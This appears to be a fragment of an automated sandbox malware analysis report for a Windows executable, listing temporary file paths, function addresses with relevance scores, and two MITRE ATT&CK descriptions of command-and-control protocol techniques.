C:\Users\user\AppData\Local\Temp\tmpB88C.tmp.dat

C:\Users\user\AppData\Local\Temp\tmpB90A.tmp.dat

C:\Users\user\AppData\Local\Temp\tmpB998.tmp.dat

C:\Users\user\AppData\Local\Temp\tmpB9D7.tmp.dat

Windows Analysis Report
17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe

Function 00007FF886FC377D Relevance: 2.6, Instructions: 2615
COMMON

Function 00007FF887143E1C Relevance: 1.7, Instructions: 1676
COMMON

Function 00007FF886FD5511 Relevance: 1.6, APIs: 1, Instructions: 124
COMMON

Function 00007FF88714F729 Relevance: 1.6, Strings: 1, Instructions: 358
COMMON

Function 00007FF88714EFA0 Relevance: 1.6, Strings: 1, Instructions: 357
COMMON

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre